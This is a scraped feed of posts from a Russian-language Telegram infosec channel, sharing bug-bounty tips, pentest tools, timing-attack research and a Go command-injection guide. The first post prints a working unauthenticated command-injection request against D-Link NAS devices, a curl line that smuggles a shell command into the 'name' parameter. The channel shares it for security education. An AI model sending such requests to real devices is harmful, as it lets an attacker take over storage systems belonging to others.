Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.88K photos
99 videos
166 files
2.92K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.me/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
🥷 Command injection в параметре name для D-Link NAS

Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.

Настолько простой баг, который можно найти простым фаззингом:

curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"

#pentest #bugbounty
🌚43🥱1
🛠️ 4 новых вектора атак на веб-приложения: за заметку этичному хакеру

Один из способов увеличения шансов на успешное обнаружение багов — поиск новых векторов атак, которые могут пропускаться другими багхантерами. Из очередного гайда от Intigriti вы узнаете про:

☑️ LLM prompt injection
☑️ Prototype pollution
☑️ Client-side path traversals
☑️ Dependency confusion

👉 Читать

#bugbounty #recon
🚀 Linux Redirection Cheat Sheet: ускоряемся в работе с потоками

Используя STDIN, STDOUT и STDERR, мы можем контролировать, как перенаправлять данные, будь то в файл или null, или объединять ошибки с выводом. Например, чтобы поймать все ошибки скрипта в отдельный лог-файл, легко использовать 2> error.log, а если хотите собрать всё вместе, можно воспользоваться 2>&1.

💡 Знаете ли вы, что порядок перенаправлений имеет значение? Команды command > /dev/null 2>&1 и command 2>&1 > /dev/null делают совершенно разные вещи! Так что будьте внимательны. 😉

#linux #tips by sysxplore
👍4
⚒️🔥 BlindBrute — настраиваемый Python-инструмент для обнаружения слепых атак с использованием SQL-инъекций

Он поддерживает несколько методов обнаружения, включая проверку кода состояния, длины содержимого, сравнение ключевых слов и проверку по времени.

Инструмент также позволяет гибко внедрять пэйлоад с помощью заголовков, строк запроса, данных запроса и сырых шаблонов HTTP-запросов, что делает его пригодным для широкого спектра кейсов.

👉 GitHub

#tools #pentest #recon
👍5
📦 Тестирование на проникновение методом белого ящика: как отлаживать JavaScript-уязвимости

На примере уязвимого для prototype pollution веб-приложения вы узнаете все необходимое про отладку JavaScript в VS Code + научитесь отслеживать пэйлоад на протяжении всего процесса разработки кода и разберетесь, как фильтры безопасности могут скрывать уязвимости.

👉 Читать гайд

#tools #bugbounty
👍3
👂 Listen to the Whispers: Web Timing Attacks that Actually Work

James Kettle наконец-то выступил с докладом по теме своего исследования, связанного с новыми концепциями атак. Они позволяют узнать секреты сервера, включая скрытые неверные конфигурации, слепое внедрение структур данных, скрытые роуты к запрещенным зонам и обширную область невидимых поверхностей атак.

👉 Смотреть

#bugbounty #research
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
💡🔍 Отфильтруйте активные имена хостов из списка пассивных поддоменов, а затем проверьте наличие активных HTTP-сервисов и определите используемые технологии с помощью опции httpx -td!

Все это можно получить с помощью простого однострочника👆

#bugbounty #recon #tips by bugcrowd
Вакансии «Библиотеки программиста» — ждем вас в команде!

Мы постоянно растем и развиваемся, поэтому создали отдельную страницу, на которой будут размещены наши актуальные вакансии. Сейчас мы ищем:
👉контент-менеджеров для ведения телеграм-каналов

Подробности тут

Мы предлагаем частичную занятость и полностью удаленный формат работы — можно совмещать с основной и находиться в любом месте🌴

Ждем ваших откликов 👾
1
🔎🕵️‍♂️ Shazzer — онлайн-фаззер, позволяющий проводить фаззинг всех видов поведения браузера. Поделитесь результатами фаззинга со всем миром и найдите новые баги!

Шпаргалки, представленные на сайте, созданы из всех соответствующих векторов атаки.

🐛 Искать баги

#tools #bugbounty
🔥2
🤔🎄🎁 Какой подарок вы бы хотели на Новый год?

Да, начинать готовиться к Новому году никогда не рано 😉

#интерактив
🥱1
🧑‍💻 Статьи для IT: как объяснять и распространять значимые идеи

Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.

Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.

Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.

👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
🌐 Браузеры — отличное место для поиска багов, особенно когда ты в числе первых врываешься в новую багбаунти-программу. Именно так и было у автора статьи. В браузере Arc ему удалось найти UXSS, Local File Read, Arbitrary File Creation и Path Traversal для RCE.

👉 Читайте о каждой уязвимости на Medium или в PDF (файл в комментариях)

#bugbounty #writeup
🔥5❤‍🔥1
🔐 Понимание уязвимостей, связанных с внедрением команд в Go

Если вы вызываете системные утилиты из кода, вы можете предпринять некоторые базовые, но важные меры предосторожности, чтобы избежать проблем с безопасностью (вы ведь не хотите, чтобы кто-то мог убедить ваш сервер запустить rm или что-то похуже).

👉 Читать гайд
😁2👍1
Привет, друзья! 👋

Мы готовим статью об ИИ-инструментах для программирования в 2024 году и хотим услышать ваше мнение! 🤖💻 Поделитесь своим опытом и помогите нам сделать материал ещё полезнее. Самые интересные ответы войдут в статью! 🏆